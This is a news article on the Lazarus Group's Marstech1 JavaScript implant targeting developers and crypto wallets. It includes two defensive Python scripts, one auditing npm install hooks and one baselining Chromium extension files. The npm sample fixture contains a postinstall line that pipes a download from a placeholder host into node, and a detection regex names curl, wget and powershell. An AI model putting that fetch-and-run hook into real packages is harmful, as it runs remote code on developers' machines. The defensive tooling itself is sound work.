Lazarus Group Unleashes Marstech1: A New JavaScript Threat Targeting Developers

By Vinayak Dhanwai, 2/16/2025

Tags: #LazarusGroup #SupplyChainAttack #JavaScriptMalware

The Lazarus Group, a well-known North Korean cybercriminal organization, has been caught using a previously unknown JavaScript-based malware named Marstech1. This new threat specifically targets developers, infiltrating open-source repositories and posing a serious supply chain risk.

How the Attack Works

Security researchers at SecurityScorecard discovered that the malware was being spread through a GitHub profile called "SuccessFriend," active since July 2024 but now deleted. The implant collects system information, modifies browser extensions, and can be embedded within websites and NPM packages, making it particularly dangerous for web and software developers.
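Because the article names NPM packages as one of the implant's delivery vectors, a defender's first question is which installed packages run code at install time. The following Python audit is an added example, not code from the article or from SecurityScorecard: it walks a node_modules tree, reports every package with an npm lifecycle hook, and flags hook bodies that fetch or evaluate remote code. The package names, script bodies and the placeholder URL in the sample tree are constructed for the demonstration; the suspicious-pattern list is a simple heuristic written for this example, not a published signature set.

```python
"""Audit an npm dependency tree for install-time lifecycle hooks.

Added example (not from the article or SecurityScorecard). It walks
node_modules, reads each package.json, and reports packages whose lifecycle
scripts execute during `npm install`. The sample tree built in
build_sample_tree() is constructed; names and scripts are placeholders.
"""
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle hooks that execute automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics: patterns that often mean a hook fetches or evaluates
# remote code. Tune for your environment; this is illustrative, not exhaustive.
SUSPICIOUS = re.compile(
    r"(curl|wget|node\s+-e|eval\(|base64|Invoke-WebRequest|powershell)",
    re.IGNORECASE,
)


def audit_node_modules(root):
    """Return (package, hook, script, suspicious) for every lifecycle hook found."""
    findings = []
    for manifest in sorted(Path(root).rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue  # an unreadable manifest is skipped, not trusted
        scripts = data.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                script = str(scripts[hook])
                name = data.get("name", manifest.parent.name)
                findings.append((name, hook, script, bool(SUSPICIOUS.search(script))))
    return findings


def build_sample_tree(root):
    """Create a constructed node_modules tree: two benign packages, one suspicious."""
    packages = {
        "left-pad-clone": {"name": "left-pad-clone", "version": "1.0.0",
                           "scripts": {"test": "node test.js"}},
        "native-helper": {"name": "native-helper", "version": "2.1.0",
                          "scripts": {"install": "node-gyp rebuild"}},
        "evil-example": {"name": "evil-example", "version": "0.0.1",
                         "scripts": {"postinstall": "curl -s http://EXAMPLE-PLACEHOLDER/x.js | node"}},
    }
    for name, manifest in packages.items():
        pkg_dir = Path(root) / "node_modules" / name
        pkg_dir.mkdir(parents=True, exist_ok=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return Path(root) / "node_modules"


def run_demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_node_modules(build_sample_tree(tmp))


if __name__ == "__main__":
    for pkg, hook, script, flagged in run_demo():
        label = "SUSPICIOUS" if flagged else "review    "
        print(f"{label} {pkg}: {hook} -> {script}")
```

Run it against a real project by calling `audit_node_modules("path/to/node_modules")`; a native addon with an `install` hook such as `node-gyp rebuild` is expected and lands in the review list, while a hook that pipes a download into `node` is flagged for immediate inspection.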

Since its first appearance in December 2024, the attack has affected at least 233 victims across the U.S., Europe, and Asia. Investigators also found two distinct versions of the malware—one in the GitHub repository and another deployed from a command-and-control (C2) server, suggesting it is still under development.

Aimed at Crypto Wallets & Software Developers

The primary goal of Marstech1 appears to be compromising cryptocurrency wallets like MetaMask, Exodus, and Atomic. Once inside a system, it scans Chromium-based browsers across different operating systems and alters extension settings, potentially redirecting or stealing crypto assets.
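The paragraph above describes the implant altering extension settings in Chromium-based browsers on several operating systems. A cheap defender-side control is a file-integrity baseline of the browser's Extensions directory, so that any later edit to an installed extension stands out. The script below is an added example, not code from the article or from SecurityScorecard; the Chrome profile paths are the standard Google Chrome locations on Windows, macOS and Linux (other Chromium browsers use analogous paths), and the extension tree used in `run_demo()` is constructed with a placeholder extension id.

```python
"""Baseline and re-check the files of installed Chromium extensions.

Added example (not from the article or SecurityScorecard). It hashes every
file under an Extensions directory and reports added, removed and modified
files on a later check. The extension tree in run_demo() is constructed.
"""
import hashlib
import os
import platform
import tempfile
from pathlib import Path


def chromium_extension_dirs():
    """Default Google Chrome extension directory for the current OS (Default profile)."""
    home = Path.home()
    system = platform.system()
    if system == "Windows":
        base = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
        return [base / "Google" / "Chrome" / "User Data" / "Default" / "Extensions"]
    if system == "Darwin":
        return [home / "Library" / "Application Support" / "Google" / "Chrome"
                / "Default" / "Extensions"]
    return [home / ".config" / "google-chrome" / "Default" / "Extensions"]


def baseline(ext_root):
    """Map each file under ext_root (relative POSIX path) to its SHA-256 hex digest."""
    ext_root = Path(ext_root)
    digests = {}
    for path in sorted(p for p in ext_root.rglob("*") if p.is_file()):
        rel = path.relative_to(ext_root).as_posix()
        digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_baseline(before, after):
    """Return added, removed and modified relative paths between two baselines."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before if p in after and before[p] != after[p]),
    }


def run_demo():
    """Constructed scenario: snapshot an extension, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        # Placeholder extension id and version folder, mirroring Chrome's layout.
        ext = Path(tmp) / "aaaaexampleextensionid" / "1.0.0_0"
        ext.mkdir(parents=True)
        (ext / "manifest.json").write_text('{"name": "wallet-example", "version": "1.0.0"}')
        (ext / "background.js").write_text("console.log('original');\n")
        before = baseline(tmp)
        # Simulate the kind of in-place edit the article attributes to the implant.
        (ext / "background.js").write_text("console.log('modified');\n")
        (ext / "injected.js").write_text("// new file\n")
        after = baseline(tmp)
        return diff_baseline(before, after)


if __name__ == "__main__":
    for d in chromium_extension_dirs():
        print("extension directory:", d, "(exists)" if d.exists() else "(not found)")
    print(run_demo())
```

In practice you would store the output of `baseline()` for each directory returned by `chromium_extension_dirs()` (as JSON, off the endpoint) and alert on any non-empty `modified` or `added` list that is not explained by a Chrome Web Store update, which creates a new version folder rather than editing files in place.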

[Figure: Attack flow diagram]

Additionally, the malware can download extra payloads from a secondary server (port 3001), giving attackers more control over infected devices. The campaign's ties to Lazarus Group's blockchain-related interests raise concerns about future attacks targeting financial platforms.

The Bigger Picture

Lazarus Group continues to evolve its attack strategies, with developers and crypto-related businesses becoming prime targets. Cybersecurity researchers warn that the supply chain attack vector is growing, making it critical for companies to stay ahead of emerging threats.

For ongoing updates on cybersecurity risks, stay tuned.